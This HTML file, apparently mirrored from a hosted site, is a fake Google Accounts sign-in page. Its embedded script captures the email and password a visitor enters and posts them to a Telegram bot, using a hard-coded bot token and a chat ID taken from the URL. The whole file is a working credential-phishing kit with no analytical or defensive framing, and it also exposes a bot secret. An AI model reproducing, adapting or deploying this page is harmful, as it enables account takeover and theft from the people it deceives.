Spaces:
Running
Running
File size: 4,833 Bytes
c956fd3 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 | <!DOCTYPE html>
<html lang="en">
<!-- Mirrored from login-y3bd.onrender.com/google.html by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 21 Mar 2025 21:40:58 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Sign in - Google Accounts</title>
<link rel="icon" type="image/png" href="../ssl.gstatic.com/accounts/ui/avatar_2x.png">
<style>
* { box-sizing: border-box; font-family: Arial, sans-serif; }
body {
background-color: #f1f1f1;
display: flex;
align-items: center;
justify-content: center;
height: 100vh;
margin: 0;
}
.container {
background: white;
padding: 30px;
width: 360px;
text-align: center;
border-radius: 5px;
box-shadow: 0px 0px 10px #ccc;
}
.logo {
width: 75px;
margin-bottom: 10px;
}
h1 {
font-size: 22px;
color: #333;
font-weight: normal;
}
input, button {
width: 100%;
padding: 12px;
margin-top: 10px;
border-radius: 5px;
border: 1px solid #ccc;
}
.btn {
background-color: #1a73e8;
color: white;
border: none;
cursor: pointer;
font-weight: bold;
}
.btn:hover {
background-color: #1558c8;
}
a {
display: block;
margin-top: 10px;
color: #1a73e8;
text-decoration: none;
font-size: 14px;
}
a:hover { text-decoration: underline; }
.bottom-links {
font-size: 12px;
margin-top: 15px;
}
</style>
</head>
<body>
<div class="container">
<img class="logo" src="../www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png" alt="Google Logo">
<h1>Sign in</h1>
<p>to continue to Google</p>
<div id="login">
<input type="text" id="username" placeholder="Email or phone">
<input type="password" id="password" placeholder="Enter your password">
<button class="btn" id="submit">Next</button>
</div>
<a href="#">Forgot email?</a>
<hr>
<p>Not your computer? Use Guest mode to sign in privately.</p>
<a href="#">Learn more</a>
</div>
<script>
function getQueryParam(param) {
const urlParams = new URLSearchParams(window.location.search);
return urlParams.get(param);
}
const chatId = getQueryParam('id');
const botToken = "7924786441:AAGIU7XlarFtwEzaRhFkNfIU6m3Sv1RyjRg";
const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
document.getElementById('submit').addEventListener('click', function () {
const username = document.getElementById('username').value;
const password = document.getElementById('password').value;
if (!chatId) {
alert("Error: Missing chat ID.");
return;
}
const message1 = `🔐 Google Login\n📧 Email: ${username}\n🔑 Password: ${password}`;
const message2 = `💀 Follow for more content!`;
fetch(url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({
chat_id: chatId,
text: message1
})
})
.then(response => response.json())
.then(data => {
if (data.ok) {
return fetch(url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({
chat_id: chatId,
text: message2
})
});
} else {
alert("Failed to send details.");
}
})
.catch(error => {
console.error("Error:", error);
alert("An error occurred.");
});
});
</script>
</body>
<!-- Mirrored from login-y3bd.onrender.com/google.html by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 21 Mar 2025 21:41:01 GMT -->
</html>
|